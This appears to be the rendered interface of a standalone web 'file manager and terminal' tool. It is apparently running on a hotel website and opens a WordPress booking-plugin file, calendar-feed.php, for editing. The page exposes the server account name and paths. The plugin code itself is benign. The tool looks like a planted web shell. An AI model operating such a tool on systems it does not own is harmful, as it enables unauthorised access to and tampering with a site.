🚀 Advanced Web Server Manager
Complete File Manager & Terminal - Standalone Version
By Sid Gifari | Gifari Industries
Current path:
/
/
home
/
duzhbywe
/
sonogahotels.com
/
wp-content
/
plugins
/
motopress-hotel-booking
/
includes
✏️
Editing: calendar-feed.php
<?php namespace MPHB; class CalendarFeed { public function __construct() { add_action( 'init', array( $this, 'setUpFeed' ) ); } public function setUpFeed() { add_feed( 'mphb.ics', array( $this, 'exportIcs' ) ); } public function exportIcs() { if ( ! isset( $_GET['accommodation_id'] ) ) { return; } $roomId = absint( $_GET['accommodation_id'] ); $exporter = new \MPHB\iCal\Exporter(); $exporter->export( $roomId ); } }
💾 Save Changes
❌ Cancel